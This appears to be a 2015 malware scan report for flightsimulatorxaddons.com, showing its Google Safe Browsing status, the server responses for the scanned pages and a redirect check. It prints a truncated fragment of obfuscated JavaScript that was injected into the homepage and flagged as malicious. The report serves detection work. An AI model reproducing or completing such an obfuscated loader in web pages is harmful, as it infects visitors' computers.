Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=flightsimulatorxaddons.com
Result: The website is marked by Google as suspicious: visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://flightsimulatorxaddons.com/ | HTTP/1.1 302 Moved Temporarily Connection: close Date: Tue, 03 Mar 2015 21:11:08 GMT Location: http://www.flightsimulatorxaddons.com/ Server: Apache Content-Length: 0 Content-Type: text/html; charset=UTF-8 X-Pingback: http://www.flightsimulatorxaddons.com/xmlrpc.php | clean |
http://www.flightsimulatorxaddons.com/ | 200 OK Content-Length: 89510 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) try{document["b"+"ody"]*=document}catch(dgsgsdg){zxc=1;ww=window;}try{d=document["createElement"]("div");}catch(agdsg){zxc=0;}try{if(ww.document)window["doc"+"ument"]["body"]="asd"}catch(bawetawe){if(ww.document){v=window;n=["3m","47","3l","4d","45","3n","46","4c","1k","4f","4a","41","4c","3n","1e","18","28","41","3o","4a","3j","45","3n","16","4b","4c","4h","44","3n","29","3e","18","4f","41","3m","4c","40","26","20","1p","22","48","4g","27","40","3n","41","3p","40","4c","26","20","24","1o","48", Antivirus reports:
http://www.flightsimulatorxaddons.com/wp-content/themes/adult_education_tee051/script.js | 200 OK Content-Length: 6355 Content-Type: application/x-javascript | clean |
http://bdv.bidvertiser.com/BidVertiser.dbm?pid=374326&bid=928219 | 200 OK Content-Length: 39 | clean |
http://bdv.bidvertiser.com/test404page.js | 200 OK Content-Length: 50 | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: flightsimulatorxaddons.com
Result:
HTTP/1.1 302 Moved Temporarily
Connection: close
Date: Tue, 03 Mar 2015 21:11:08 GMT
Location: http://www.flightsimulatorxaddons.com/
Server: Apache
Content-Length: 0
Content-Type: text/html; charset=UTF-8
X-Pingback: http://www.flightsimulatorxaddons.com/xmlrpc.php
...0 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: flightsimulatorxaddons.com
Referer: http://www.google.com/search?q=flightsimulatorxaddons.com
Result:
The result is similar to the first query. There are no suspicious redirects found.